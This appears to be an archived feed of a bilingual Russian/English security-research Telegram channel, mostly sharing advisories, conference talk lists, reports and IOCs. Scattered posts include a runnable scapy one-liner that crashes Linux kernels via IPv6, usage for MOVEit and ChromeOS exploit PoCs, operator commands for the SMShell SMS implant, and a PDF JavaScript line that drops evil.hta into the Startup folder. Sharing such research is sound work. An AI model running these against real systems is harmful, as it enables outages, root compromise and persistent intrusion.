🔥SRC-2021-0014(CVE-2021-31827) : Progress MOVEit Transfer (DMZ) SILHuman FolderApplySettingsRecurs SQL Injection Remote Code Execution Vulnerability"This vulnerability allows remote attackers to execute arbitrary code on affected installations of MOVEit Transfer. Authentication is required to exploit this vulnerability.The specific flaw exists within the FolderApplySettingsRecurs function of the SILHuman class. The issue results from the lack of proper validation of the user-supplied parameters when calling the folderapplysubfoldersettings transaction. An attacker can leverage this vulnerability to execute code in the context of the database server."🤔Интересно, однако...🛡Исключительно в ознакомительных мерах!🛡Solely for informational purposes🔗PoC находится тут🔗PoC hereКак использовать/How to use:./poc.py <host> <ASP.NET_SessionId>#exploitation #MOVEit #RCE #Auth_is_required
2023-06-02 13:54:42
⚠️Rapid7 Observed Exploitation of Critical MOVEit Transfer Vulnerability🛡MOVEit Transfer Critical Vulnerability (May 2023)🛡Critical Vulnerability in Progress MOVEit Transfer: Technical Analysis and Recommendations🛡MOVEit Transfer Critical Vulnerability Rapid Response🔖Sigma rules🔖Sigma rule "MOVEit Transfer 0day - file creation event" File IOCs:C:\MOVEitTransfer\wwwroot\human2.aspxIP IOCs:🌐138.197.152[.]201🌐209.97.137[.]33🌐5.252.191[.]0/24🌐148.113.152[.]144 🌐89.39.105[.]108 Images
2023-06-02 11:06:32
📕North Korea Using Social Engineering to Enable Hacking of Think Tanks, Academia, and Media#FBI #NSA #Department_of_State #NIS #NPA #MOFA #DPRK #Kimsuky #THALLIUM, #VELVETCHOLLIMA #APT43 #BlackBanshee #SE #spearphishing #network #expoitation #intelligence
2023-06-02 11:06:26
#FBI #NSA #Department_of_State #NIS #NPA #MOFA #DPRK #Kimsuky #THALLIUM, #VELVETCHOLLIMA #APT43 #BlackBanshee #SE #spearphishing #network #expoitation #intelligence Images Images Images Images
2023-06-02 10:50:12
📕Targeted Deanonymization via the Cache Side Channel: Attacks and Defenses"In this paper, we describe a side-channel attack technique which lets a malicious website discover whether a visitor to the website bears a certain public identifier, such as an email address or a Twitter handle. Our attack works against multiple operating systems, including Windows, MacOS and Android. It affects multiple browsers, including Tor, Safari and Chrome. It can target major sites including Google, Twitter, LinkedIn, TikTok, Facebook, Instagram and Reddit."📰[Wired]A New Attack Can Unmask Anonymous Users on Any Major Browser
2023-06-02 10:49:02
|AppSec Ezine|📰485rd EditionRelease Date: 02/06/2023pathonprojectgithub#ezine #appsec #infosec Images
2023-05-31 00:03:27
💥Спустя короткое время появились записи выступлений с OffensiveCon23, посему прикладываю ниже список, состоящий из ссылок на оные.💥After a while, recordings of performances from OffensiveCon23 appeared, therefore I attach below a list consisting of links to them.📺Information Security Is an Ecology of Horrors and You Are the Solution📺Abusing Linux In-Kernel SMB Server to Gain Kernel Remote Code Execution📺The Print Spooler Bug that Wasn’t in the Print Spooler📺New Phones, Software & Chips = New Bugs?📺Racing Against the Lock: Exploiting Spinlock UAF in the Android Kernel🔥 Bad Spin: Android Binder LPEPrivilege escalation exploit from unstrusted_app for Android Binder vulnerability (CVE-2022-20421).📺MacDirtyCow – Auditing and Exploiting XNU Virtual Memory📺Exploit Engineering – Attacking the Linux Kernel🔥 libslub is a python library to examine the SLUB managements structures and object allocations (the Linux kernel heap implementation). It is currently designed for use with GDB but could easily be adapted to work with other debuggers.📺A Dark Side of UEFI: Cross-Silicon Exploitation📺ASN.1 and Done: A Journey of Exploiting ASN.1 Parsers in the Baseband📺Changing and Unchanged Things in Vulnerability Research📺Your Mitigations Are My Opportunities📺Embedded Threats: A Deep Dive into the Attack Surface and Security Implications of eSIM Technology📺Unearthing Vulnerabilities in the Apple Ecosystem: The Art of KidFuzzerV2.0📺What’s in a Name?📺Advancements in JavaScript Engine Fuzzing📺Inside Apple’s Lightning: JTAGging the iPhone for Fuzzing and Profit📺CustomProcessingUnit: Reverse Engineering and Customization of Intel Microcode🔥 Custom Processing Unit is the first dynamic analysis framework able to hook, patch and trace CPU microcode at the software level.📺How to Hack Shannon Baseband (from a Phone)#OffensiveCon23 #security #expoitation #fuzzing #Linux #RCE #SMB #KSMBD #Windows #PrintSpooler #PE #Intel #baseband #WindowsMitigations #TypeConfusion #bypassing #ExploitationTechniques #libslub #Chrome #MojoIPC #SBX #XNU #VMS #MacDirtyCow #eSIM #eUICC #Apple #iPhone #SRD #M1 #DFU #JTAG #Tristar #SDQ #IDBUS #LightningFuzzer #SWD #checkm8 #SAST #DAST #AtomMicrocode #Goldmont #Ghidra #UEFI #PAC #JSengine #Fuzzilli #V8 #mutators #Android #Binder #spinlock #UAF #kernelAAR #kernelAAW #kASLRbypass #SELinux #fw #Qualcomm #AMD #ARM #x86 #ProjectVolterra #SecureBootBypass #persistence #TZ #IOKitDrivers #KidFuzzerV2_0 #BackwardFuzzing #Co_Processor #DCP #SEP #AOP #SoC #GoogleTensor #OOB #TrustySMC #LogicError #DRM_LDFW #TEE #TSC
2023-05-31 00:03:23
🗃Ваш покорный слуга скачал все доступные на данный момент презентации с OffensiveCon23 и укомплектовал в архив.🗃Your humble servant downloaded all currently available presentations from OffensiveCon23 and archived them.#OffensiveCon23 #security #expoitation #fuzzing #Linux #RCE #SMB #KSMBD #Windows #PrintSpooler #PE #Intel #baseband #WindowsMitigations #TypeConfusion #bypassing #ExploitationTechniques #libslub #Chrome #MojoIPC #SBX #XNU #VMS #MacDirtyCow #eSIM #eUICC #Apple #iPhone #SRD #M1 #DFU #JTAG #Tristar #SDQ #IDBUS #LightningFuzzer #SWD #checkm8 #SAST #DAST #AtomMicrocode #Goldmont #Ghidra #UEFI #PAC #JSengine #Fuzzilli #V8 #mutators #Android #Binder #spinlock #UAF #kernelAAR #kernelAAW #kASLRbypass #SELinux #fw #Qualcomm #AMD #ARM #x86 #ProjectVolterra #SecureBootBypass #persistence #TZ #IOKitDrivers #KidFuzzerV2_0 #BackwardFuzzing #Co_Processor #DCP #SEP #AOP #SoC #GoogleTensor #OOB #TrustySMC #LogicError #DRM_LDFW #TEE #TSC
2023-05-31 00:02:20
#OffensiveCon23 #security #expoitation #fuzzing #Linux #RCE #SMB #KSMBD #Windows #PrintSpooler #PE #Intel #baseband #WindowsMitigations #TypeConfusion #bypassing #ExploitationTechniques #libslub #Chrome #MojoIPC #SBX #XNU #VMS #MacDirtyCow #eSIM #eUICC #Apple #iPhone #SRD #M1 #DFU #JTAG #Tristar #SDQ #IDBUS #LightningFuzzer #SWD #checkm8 #SAST #DAST #AtomMicrocode #Goldmont #Ghidra #UEFI #PAC #JSengine #Fuzzilli #V8 #mutators #Android #Binder #spinlock #UAF #kernelAAR #kernelAAW #kASLRbypass #SELinux #fw #Qualcomm #AMD #ARM #x86 #ProjectVolterra #SecureBootBypass #persistence #TZ #IOKitDrivers #KidFuzzerV2_0 #BackwardFuzzing #Co_Processor #DCP #SEP #AOP #SoC #GoogleTensor #OOB #TrustySMC #LogicError #DRM_LDFW #TEE #TSC Images
2023-05-26 19:27:49
🙃Что могу сказать, взглянув на код qTox мельком, был (не)приятно удивлен от безопасности оного. То есть авторы не удосужились прочитать даже Modern Memory Safety: C/C++ Vulnerability Discovery, Exploitation, Hardening.Наглядный пример прикладываю на скриншоте с integer truncation(1, 2, 3).Валидация входных данных - не, не слышали. Так что вполне себе можно достичь integer overflow и это только лишь один файл. Думаю, как закрою основные задачи, то можно плотно взяться за ресерч. Images Images
2023-05-26 19:26:18
|AppSec Ezine|📰484rd EditionRelease Date: 26/05/2023pathonprojectgithub#ezine #appsec #infosec Images
2023-05-26 19:22:50
⛓1day link Private Shizo(fully free)
2023-05-24 09:12:36
"There are things that tend to moderate with age. Schizophrenia is somewhat like that."#WorldSchizophreniaDay #JohnNashJr Images
2023-05-23 20:49:02
🤔На дворе точно 2023 год?Код ревью: 4248158 "arc: Verify input string from chronos to arcvm-media-sharing-services"🤔Is it exactly 2023?Сode review: 4248158"arc: Verify input string from chronos to arcvm-media-sharing-services" Images Images
2023-05-23 20:17:59
🔥ChromeOS root privilege escalation (mount-passthrough-jailed)Mount-passthrough-jailed uses shflags and therefore will use eval over the passed arguments. These arguments can be controlled via chronos. This results in arbitrary command execution as rootReproduction case:💥Execute privesc.sh attached as follows:sh <(cat privesc.sh)⚠️The script should immediately return with a root shell!
2023-05-23 19:56:14
📕StopRansomware Guide 2.0 (publication: May 2023, Initial Version "1.0" released in September 2020)#CISA #NSA #FBI #MS_ISAC #security #ransomware #best_practices #initial_access #ZTA #Threat_hunting #CI #CIS #CNI
2023-05-23 19:56:08
#CISA #NSA #FBI #MS_ISAC #security #ransomware #best_practices #initial_access #ZTA #Threat_hunting #CI #CIS #CNI Images Images Images Images
2023-05-22 23:34:44
💥Series of blogposts: "Introduction to macOS" helping people transition to macOS infosec.💾Introduction to macOS - macOS App structure💾Introduction to macOS - Gatekeeper💾Introduction to macOS - the App sandbox💾Introduction to macOS - SIP💾Introduction to macOS - TCC Images
2023-05-22 19:53:16
🔥CustomProcessingUnit: Reverse Engineering and Customization of Intel Microcode.
2023-05-22 19:53:15
None Images Images Images Images Images Images Images Images Images
2023-05-22 19:38:55
#OffensiveCon23 #security #WWAN #eSIM #eUICC #SMS #C2 #implant #persistence #shell
2023-05-22 19:38:45
|Introducing SMShell|🛡Только в ознакомительных целях!🔥 Продолжая тему eSIM с выступления Маркуса Вервье(@marver) "Embedded Threats: A Deep Dive into the Attack Surface and Security Implications of eSIM Technology", стоит отметить вот-вот вышедший PoC импланта на основе SMS "SMSshell", который по сути может отрабатывать команды через cmd.exe с помощью SMS. Причем, за счет сжатия и разделения вывода вывода команды на несколько сообщений, за счет чего имплант может обрабатывать сообщения, которых длинна превышает в 160 символов. То есть, в качестве транспортного механизма для RCE задействованы SMS-сообщения, обходя сетевые сенсоры и корпоративные фильтры.Данный "финт ушами" возможен благодаря WWAN модулям, оснащенными модулями eSIM, которые в свою очередь имеют не маленькую поверхность для атак. Использовать SMShell довольно просто:💾На машине жертвы должен выполниться бинарь client-agent.exe.💾Далее, в качестве параметра для бинарника server-console.exe, оператор указывает номер телефона жертвы:server-console.exe +78005553535💾В случае использования python-скрипта, необходимо задать данные MiFi:python3 server-console.py --mifi-ip 192.168.0.1 --mifi-username admin --mifi-password 12345678 --number +78005553535 -v🛡For educational purposes only!🔥 Continuing the topic of eSIM from the speech of Markus Vervier's(@marver) speech "Embedded Threats: A Deep Dive into the Attack Surface and Security Implications of eSIM Technology", it is worth noting that the PoC of the implant based on SMS "SMSshell" is about to be released, which in fact can work out commands via cmd.exe via SMS. Moreover, by compressing and dividing the output of the command output into several messages, due to which the implant can process messages whose length exceeds 160 characters. That is, SMS messages are used as a transport mechanism for RCE, bypassing network sensors and corporate filters.This "feint with ears" is possible thanks to WWAN modules equipped with eSIM modules, which in turn have not a small surface for attacks.Using SMShell is quite simple:💾By the victim’s machine, client-gent.exe binary should be performed.💾Further, as a parameter for server-console.exe binary, the operator indicates the victim’s phone number:server-console.exe +78005553535💾In the case of using a Python script, you must set the data of MIFI:python3 server-console.py --mifi-ip 192.168.0.1 --mifi-username admin --mifi-password 12345678 --number +78005553535 -v#OffensiveCon23 #security #WWAN #eSIM #eUICC #SMS #C2 #implant #persistence #shell
2023-05-22 19:38:26
#OffensiveCon23 #security #WWAN #eSIM #eUICC #SMS #C2 #implant #persistence #shell
2023-05-22 19:02:04
None Images Images Images Images Images Images Images Images
2023-05-21 23:09:33
|Suspicious iOS KeePass Client|🦠Заходишь в App Store и находишь KeePassMini(приложение для iOS, которое открывает БД KeePass, веб-сайт здесь, ранее называлось iOSKeePass и можно тут посмотреть прежнюю версию) а тут...Все содержимое твоего буфера обмена(clipboard) отправляется по UDP-протоколу в открытом виде на сервер к разработчикам ака злоумышленникам. Потом прилетает обновление и содержимое буфера обмена по-прежнему отправляется по UDP, но вот только с фиксированным ключом и IV, причем в последней версии отключена аналитика.Думаете на этом все закончилось? Нет! Разработчик(и) подчистили репо вместе с удалением истории.🤙Спасибо @ghidraninja🦠You go to the App Store and find KeePassMini (an iOS application that opens the KeePass database, the website is here, previously it was called iOSKeePass and you can see the previous version here) and here ...All the contents of your clipboard are sent over the UDP protocol in open form to the server to developers aka attackers. Then the update arrives and the contents of the clipboard are still sent via UDP, but only with a fixed key and IV, and analytics is disabled in the latest version.Do you think that's the end of it? No! The developer(s) cleaned up the repo along with deleting the history.🤙Thx @ghidraninja#iOS #unencryptedChannel #steal #UNsecure
2023-05-21 23:00:04
#iOS #unencryptedChannel #steal #UNsecure Images Images
2023-05-21 14:16:49
#OffensiveCon23 #security #vulnerability #eSIM #eUICC #cryptography
2023-05-21 14:15:57
|MultiRand|🔓Данный инструмент "MultiRand" вышел к выступлению Маркуса Вервье(@marver) "Embedded Threats: A Deep Dive into the Attack Surface and Security Implications of eSIM Technology", посвященному поверхности атак на eSIM/eUICC, безопасность в целом, потенциальные риски и проблемы оных.MultiRand(протестирована только реализация glibc TYPE_0) может использоваться для поиска слабых секретных ключей(weak secret keys), реализуя небезопасные псевдослучайные линейные конгруэнтные генераторы, использующие параметры различных распространенных реализаций rand().⚙️Использование инструмента довольно простое, вот к примеру вариант с использование семян(seeds, очень кратко в репозитории) 1 и 2, вызовом glibc rand() по 2 раза каждого, преобразуя выходные данные в 16-битный int:random-impl -i glibc_type_0 --start 1 --end 2 --count 2 -t16 | xxd -p -c 2⚙️Или предварительно сгенерируем слабые случайные ключи с помощью borland_c_rand:random-impl -i borland_c_rand --start 1 --end 10 --count 8 -t8 | xxd -p -c 8🔓This MultiRand tool was released to Markus Vervier's(@marver) speech "Embedded Threats: A Deep Dive into the Attack Surface and Security Implications of eSIM Technology", dedicated to the surface of attacks on eSIM/eUICC, security in general, potential risks and problems thereof.MultiRand(only the glibc TYPE_0 implementation has been tested) can be used to find weak secret keys by implementing insecure pseudorandom linear congruent generators using parameters of various common rand() implementations.⚙️The use of the tool is quite simple, for example, here is an option with the use of seeds(more in repo) 1 and 2, calling glibc rand() 2 times each, converting the output data into a 16-bit int:random-impl -i glibc_type_0 --start 1 --end 2 --count 2 -t16 | xxd -p -c 2⚙️Or generate weak random keys using borland_c_rand:random-impl -i borland_c_rand --start 1 --end 10 --count 8 -t8 | xxd -p -c 8#OffensiveCon23 #security #vulnerability #eSIM #eUICC #cryptography
2023-05-21 14:15:30
#OffensiveCon23 #security #vulnerability #eSIM #eUICC #cryptography Images Images
2023-05-19 20:56:49
🤙Приветствую, дорогой подписчик или прибывший читатель! Нас уже более семи тысяч , за что очень сильно благодарен. Время вместе очень сильно пролетело, даже и не заметил, как прошло больше года с первого поста. Многое изменилось и чтобы лучше разобраться в анонимности/приватности/цифровой криминалистике, мне пришлось начать изучать глубже безопасность(в данном контексте - исследование уязвимостей). Не буду загадывать будущее или делать какие-то анонсы, скорее хотелось сказать человеческое "Спасибо" за то, что читаете посты, делитесь ими, обсуждаете и в целом проявляете интерес.Знайте, вы самые лучшие и умные для меня!😉Помимо такой большой цифры(до сих пор не верится), сегодня пятница, а это значит что выходные наступят вот-вот, поэтому хочу пожелать прекрасного отдыха, побольше хорошего в жизни, получать удовольствие от того рода деятельности, которым занимаетесь и поменьше унывать, ведь живем лишь раз!🤙Greetings, dear subscriber or arriving reader! There are already more than seven thousand of us, for which I am very grateful. The time together flew by very much, I didn't even notice how more than a year has passed since the first post. A lot has changed and in order to better understand anonymity/privacy/digital forensics, I had to start studying security more deeply (in this context, vulnerability research). I will not make any predictions about the future or make any announcements, rather I would like to say a human "Thank you" for reading the posts, sharing them, discussing and generally showing interest.Know that you are the best and smartest for me!😉In addition to such a large figure (I still can't believe it), today is Friday, which means that the weekend is about to come, so I want to wish you a wonderful holiday, more good things in life, enjoy the kind of activity you are engaged in and less discouraged, because we only live once!😊Если материалы, публикуемые на канале помогли даже раз, то тепло в моем сердце будет долго оставаться от радости.😊If the materials published on the channel helped even once, then the warmth in my heart will remain for a long time from joy.
2023-05-19 20:54:56
None
2023-05-19 17:58:30
None Images Images Images Images Images Images Images Images Images Images
2023-05-19 12:53:38
|AppSec Ezine|📰483rd EditionRelease Date: 19/05/2023pathonprojectgithub#ezine #appsec #infosec Images
2023-05-18 11:12:26
⚡️ Дорогие друзья! Рады сообщить, что 14-15 сентября в Москве состоится одно из самых масштабных мероприятий в области цифровой криминалистики и информационной безопасности — «MOSCOW FORENSICS DAY 2023».В этом году всех участников конференции ждут:✅ интереснейшие доклады и мастер-классы от признанных экспертов-практиков из областей цифровой криминалистики и информационной безопасности;✅ встреча с экспертами и представителями ведущих компаний в области цифровой криминалистики и информационной безопасности в выставочной зоне;✅ общение с единомышленниками со всей России и стран СНГ;✅ афтерпати в одном из лучших отелей Москвы;✨ и многое другое, о чем расскажем совсем скоро!📨 Скорее регистрируйтесь, чтобы не пропустить одно из самых ожидаемых мероприятий в области цифровой криминалистики и информационной безопасности!Подробнее о мероприятии можно узнать здесь. Images
2023-05-17 10:59:05
💥Спустя время появились записи выступлений с Hack In The Box 2023 Amsterdam, посему прикладываю ниже список, состоящий из ссылок на оные.💥After a while, recordings of performances from Hack In The Box 2023 Amsterdam appeared, therefore I attach below a list consisting of links to them.📺 XRP Raid Protector: Killing A Critical Bug Worth 40 Billion Dollars📺 Current State Of IOS Malware Detection📺 Nakatomi Space: Lateral Movement As L1 Post-Exploitation In OT📺 Syscalls In Shellcode: Techniques For Malicious Functionality📺 SOHO Hacking At Pwn2Own📺 Next Generation Virtualization-Based Obfuscators📺 Bypassing Anti-Cheats And Hacking Competitive Games📺 Advanced DMA Reentrancy Techniques To Escape QEMU📺 A Tale Of Building A REAL Full Speed Anti-Censorship Router📺 Hunting Windows Desktop Window Manager Bugs📺 ChatGPT Please Write Me A Piece Of Polymorphic Malware📺 Automated Black-box Security Testing Of “Smart” Embedded Devices📺 How MySQL Servers Can Attack YOU📺 PANEL DISCUSSION: iOS / OS X Security📺 A Deep Dive Into GarminOS And Its MonkeyC Virtual Machine📺 Active Directory Abuse Primitives And Operation Security📺 Smart Speaker Shenanigans: Making The SONOS One Sing📺 Exploiting IPC With New Desynchronization Primitives📺 CLOSING KEYNOTE - The Hand That Strikes, Also Blocks📺 Investigating Web3 With OSINT📺 An Analysis Of Computer Numerical Control Machines In Industry 4.0📺 Privilege Escalation Using DOP In MacOS#HITB2023 #security #API #AV #Fingerprinting #Honeypots #PostExploitation #hacking #shellcode #iOS #windows #malware #bugs #WAN #LAN #AntiCensorship #obfuscation #virtuallization #XRP #automotive #car #SDR #RFanalysis #MySQL #RedTeam #infrastructure #DMA #QemuEscape #expoitation #Embedded #fw #fuzzing #Ghidra #Gophers #Golang #SONOS #macOS #expoitation #vulnerability #PE #DOP #ChatGPT #polymorphicMalware #KernelDrivers #GarminOS #MonkeyC #FW #VM #ICS #SupplyChain #MTConnect
2023-05-16 23:30:26
None Images Images Images
2023-05-15 23:29:43
📕Maybenot: A Framework for Traffic Analysis Defenses" Defenses in Maybenot are expressed as probabilistic state machines that schedule actions to inject padding or block outgoing traffic. Maybenot is an evolution from the Tor Circuit Padding Framework by Perry and Kadianakis, designed to support a wide range of protocols and use cases."Crates:💾 Maybenot💾 Maybenot Simulator⚠️The framework and simulator will be released in Q2 2023!🌐"Maybenot Firefox WireGuard 2021 Week 15” dataset#network #security #privacy #cryptography #E2E #Tor #Circuit_Padding_Framework #Wireguard #QUIC #traffic_analysis #anti_analysis
2023-05-15 23:29:32
#network #security #privacy #cryptography #E2E #Tor #Circuit_Padding_Framework #Wireguard #QUIC #traffic_analysis #anti_analysis Images Images Images Images
2023-05-15 19:10:03
🔥🔥🔥Linux IPv6 "Route of Death" 0dayThis vulnerability allows remote attackers to create a DoS condition on affected installations of Linux Kernel. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of the RPL protocol. The issue results from the lack of proper handling of user-supplied data, which can result in an assertion failure. An attacker can leverage this vulnerability to create a DoS condition on the system.PoC:from scapy.all import *; p=IPv6(dst=target_ipv6_addr)/IPv6ExtHdrSegmentRouting(type=3, addresses=['a8::', 'a7::', 'a6::'], segleft=1, lastentry=0xf0);send(p)⚠️It was assigned CVE-2023-2156 but the bug patch didn't solve the underlying problem (ZDI confirmed this too), so we're still expecting another patch at somepoint. However, it has now been released as an 0day. Massive props to ZDI for relentlessly chasing up the fix over the past year. Images Images Images
2023-05-15 19:09:11
None Images
2023-05-15 00:21:42
🧰С некоторыми выступлениями с Black Hat Asia 2023 были представлены инструменты и PoCs, их тоже скачал и укомплектовал в архив(внутри есть txt-файл "List.txt", который содержит ссылки на оные и название докладов вместе с которыми были они предствалены).🧰With some performances from Black Hat Asia 2023, tools and POCs were presented, I also downloaded them and archived them (inside there is a txt file "List.txt" that contains links to them and the name of the reports with which they were presented).#BHasiaTools #security #Graph #TTPs #exploitation #RE #Arm #CodeInjection #Network #cryptography #WiFi #WiFi_Framework #transmitQueueManipulations #clientIsolationBypasses #intercept #MAC #browsers #WebAssembly #WebKit #fuzzing #XMap #ZMap #ICMP #EchoScans #TCP_SYN_scans #UDPprobes #DNS #malware #Shellcode #memory_scanning #CFG_bitmap #ETW #kernel_telemetry
2023-05-14 15:57:09
Пару недель назад мы смотрели на каких устройствах стоит свежее ядро, но были неприятно удивлены, что даже на флагманах обновления прилетают с хорошим запозданием, влияя на безопасность устройств.Но один хороший человек прислал скриншот телефона с установленными кедами (KDE), где был +- из последних версий ядро linux.Это сподвигло меня изучить мир мобильного линукса.Оказалось, что дистрибутивов достаточно для тестов и я взял за основу свой старый Asus ZenFone M1 и свежекупленный Oneplus 6.На Асус смог накатить Ubuntu Touch, где спокойно запустил Waydroid. На Oneplus 6 накатывались postmarketOS и OpenSUSE Tumbleweed. По использованию в течение дня могу сказать, что опыт с убунтой оказался более дружелюбным и более стабильным, чем вариант с Oneplus. OpenSUSE с кедами валился чаще, чем я мог предположить и "юзабилити" стремилось к нулю. Ниже список ссылок на известные мне оси, которые вы можете посмотретьhttps://get.opensuse.org/tumbleweed/ (образа тут)https://ubuntu-touch.io/https://mobian-project.org/https://postmarketos.org/https://sailfishos.org/https://pureos.net/Сделаю замечание - портативные линуха пока заводятся на Snapdragon 845. Имейте ввиду. Есть также поделки в виде Pinephone, но данный аппарат нужно будет заказать и потыкать вживую. Также несмотря на то, что OpenSUSE сейчас сырой, посмотрим что скажут на ближайшей конференции. Может будут развивать мобильный вариант как альтернативу андроиду
2023-05-12 21:46:01
🗃Ваш покорный слуга скачал все доступные на данный момент презентации с Black Hat Asia 2023 и укомплектовал в архив.🗃Your humble servant downloaded all currently available presentations from Black Hat Asia 2023 and archived them.#BHasia #security #Bugs #expoitation #cryptography #Kernel #linux #ebpf #IoT #APT #espionage #CTI #DFIR #malware #privacy #mobile #GooglePixel #Rooting #Android #RF #HW #FW #RE #LockPick #JS #PrototypePollution #RCE #InsiderThreats #TTP #PMFault #FaultInjection #Windows #PPL #ransomware #AI #ML #DataScience #detection #OT #PLCs #RTUs #Schneider #LateralMovement #Arm #CodeInjection #WiFi #WPA3 #MCU #SCA #TimingAttacks #Chrome #fuzzing #WebSQL #hybridWar #Java #Gadgets_SSRF_RCE #EPZ #NTFS #LPE #Webkit #WASM #DNS #CFG #ETW #Shellcode #immutableCode #supplyChainAttacks #CriticalInfrastructure #IIoT
2023-05-12 21:37:56
#BlackHatAsia2023 Images
2023-05-12 20:22:28
timeout = app.setTimeOut("event.target.exportXFAData({cPath: \"/c/users/\" + identity.loginName + \"/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/evil.hta\"});
2023-05-12 18:34:52
None
2023-05-12 18:22:02
⛓Private Shizo 1day link(fully free)
2023-05-12 17:46:27
|AppSec Ezine|📰482rd EditionRelease Date: 12/05/2023pathonprojectgithub#ezine #appsec #infosec Images
2023-05-09 16:02:53
📕Hunting Russian Intelligence “Snake” Malware#FSB #CSA #security #NSA #FBI #CISA #CNMF #NATO #NCSC #ACSC #malware #implant #Snake #Uroburos #attribution #TTPs #espionage #intelligence #C2
2023-05-09 16:02:25
#FSB #CSA #security #NSA #FBI #CISA #CNMF #NATO #NCSC #ACSC #malware #implant #Snake #Uroburos #attribution #TTPs #espionage #intelligence #C2 Images Images Images Images Images Images Images Images
2023-05-06 19:06:33
None Images Images Images
2023-05-05 18:35:49
📡Space Odyssey: An Experimental Software Security Analysis of SatellitesЕсли кто вдруг хочет узнать, что там с безопасностью образов fw(firmware) орбитальных спутников и какие в целом угрозы для fw спунтиков. В данной работе рассказывается о анализе безопасности и найденных критических уязвимостях в fw спутников на примере трех образов, которые используются в реальных аппаратах, а также таксономия угроз для оных.If anyone suddenly wants to find out what's going on with the security of images of fw(firmware) orbiting satellites and what are the overall threats to fw of satellites. This paper describes the analysis of security and critical vulnerabilities found in fw satellites using the example of three fw images that are used in real devices, as well as the taxonomy of threats to them.#security #satellite #firmware #software #vulnerabilities #expoitation
2023-05-05 18:35:24
#security #satellite #firmware #software #vulnerabilities #expoitation Images Images Images Images Images
2023-05-05 08:44:48
|AppSec Ezine|📰481rd EditionRelease Date: 05/05/2023pathonprojectgithub#ezine #appsec #infosec Images
2023-05-01 14:53:33
#Osint_eventНас звали, и мы пришли Osint Workshop Ⅳ (Moscow edition) ! В этот раз наша команда посетит столицу и расскажет о новых методиках, интересных кейсах и погрузит вас в атмосферу наших профессиональных будней. Ждем вас 😉Планируемые доклады: "Osint и S.E. в Нетворкинге, Поиск влиятельных друзей в цифровом океане"● Автор: «Обмани Меня»"Osint в адвокатской деятельности"● Автор: [REDACTED]"Дом выигрывает всегда? В поисках владельцев одного казино"● Автор: «Исследуя конкурентов» При участии: Moon, Dana Scully(возможно, к нам присоединятся наши коллеги из Москвы)Мероприятие пройдет 13 мая, в 18:00 по адресу: Green Vault, лаундж-бар, Верхняя Радищевская улица, 13-15, МоскваВход без паспорта, бесплатно. Images
2023-05-01 13:35:05
|How the Great Firewall of China Detects and Blocks Fully Encrypted Traffic|🌐Довольно интересная работа про Великий Файрвол Китая(Great Firewall of China, GFW), который предназначен для цензурирования зашифрованного сетевого трафика. По сути цензор использует эвристику(построенная на фингерпринтинге распространенных протоколов, доле установленных битов, а также количестве, дроби и положении печатаемых символов ASCII), исключающую трафик, который с в большей мере является зашифрованным, но не полностью и после некоторых манипуляций происходит блокировка оставшегося и не исключенного сетевого трафика. Также, в работе обсуждаются и контрмеры механизму цензуры GFW(по сути позволяя в дальнейшем обходить оную форму блокировки). ⛓ Репозиторий с артефактами для воспроизведения основных утверждений, описанных в работе.#censorship #China #GFW #antiCensorship #network #DPI
2023-05-01 13:34:37
|How the Great Firewall of China Detects and Blocks Fully Encrypted Traffic|🌐 Quite an interesting work about the Great Firewall of China (GFW), which is designed to censor encrypted network traffic. In fact, the censor uses heuristics (based on fingerprinting of common protocols, the proportion of set bits, as well as the number, fraction and position of printed ASCII characters), excluding traffic that is mostly encrypted, but not completely, and after some manipulations, the remaining and not excluded network traffic is blocked. Also, the paper discusses countermeasures to the GFW censorship mechanism (in fact, allowing you to bypass this form of blocking in the future).⛓ Repository with artifacts to reproduce the major claims in paper.#censorship #China #GFW #antiCensorship #network #DPI Images Images Images Images
2023-05-01 13:03:10
🕵️‍♂️Для того, чтобы в дальнейшем не было вопросов такого плана в DM, отвечу про положение дел на данный момент. Во-первых, все шутки про мою причастность к трехбуквенным/двухбуквенным - не более чем шутки и мне не приходилось и дня работать на оных. Во-вторых, если все-таки есть желание пойти за передовыми знаниями и получить отличный опыт, то могу посоветовать посмотреть в сторону Израиля(если уверены в силах - Mossad(המוסד, Институт Разведки и специальных операций) /Unit 8200(חידה 8200) и в целом подразделения оного). Предварительно советую прочитать работу про историю, организацию, операции и возможности Unit 8200, а также посмотреть видео про работу Unit 8200, почитать про корпоративную структуру NSO GROUP и советую в целом ознакомиться с историй разведывательных подразделений(бригад) Израиля. Вакансии от Mossad можно посмотреть тут.Главное - мне никто оттуда не заплатил и это лишь совет для тех, кто желает быть на "острие" технологий.#Israel #IntellDivision #Mossad #Unit8200 #Unit9900 #Unit504 Images
2023-04-30 19:29:58
#cryptography #crypto_wallet #attacks #bitcoin #mobile #network #web #wifi #windows #eliptic_curves #brainwallets #mitm #cve #tool #malware #phishing #Blockchain #RIPEMD #SHA256 #ECC #social_engineering #quantum_mechanics #qubit #security #snooping #neural_networks #ECDSA #chosen-IV #dust_attack #hardware_wallet #dos
2023-04-30 19:29:41
Добрый день, мои Алисы!🎀Ну что, проследуем за белым кроликам в самые глубины Зазеркалья.🔮Я наконец-то доделала статью про Биткоины, хоть это и заняло немало времени, я считаю, что была проделана поистине большая работа, как по части материала, так и подачи.Надеюсь эта статья окажется вам полезна и поможет погрузиться в атаки на Биткоины.Я настоятельно советую провести вам свое исследование, для этого ниже к статье прилагается архив с полезных материалов.Хорошего путешествие в мир биткоинов!❤️Русская версия:#cryptography #crypto_wallet #attacks #bitcoin #mobile #network #web #wifi #windows #eliptic_curves #brainwallets #mitm #cve #tool #malware #phishing #Blockchain #RIPEMD #SHA256 #ECC #social_engineering #quantum_mechanics #qubit #security #snooping #neural_networks #ECDSA #chosen-IV #dust_attack #hardware_wallet #dos Images
2023-04-28 12:56:31
В процессе размышлений как удалять данные устройства (полностью) при несанкционированном доступе, рассматривал массу вариантов, включая отработку макросов.Макросы конечно хорошо (привет Tasker и MacroDroid), но, как по мне, полный вайп надежнее провернет утилита Wasted и Duress, затронутые в посте дружани Шизо.Потрачено (как же это звучит всрато :D) дает возможность гибкой настройки вайпа, а в Duress можно настроить удаление как пароль + несколько символов либо по определенному паролю. И еще момент - эти приложения не требуют рута и ставятся на обычное устройство с любой прошивкой. Может быть проблема с Duress - не активируется в настройках Assistance (Спец. возможности). Данная проблема решается путем установки приложения не из репы F-Droid, а из обычного плеймаркета.З.Ы. Данные рабочего профиля тоже убивает, если вы настраиваете Потрачено в нем. На виртуалке не работает.
2023-04-28 12:15:59
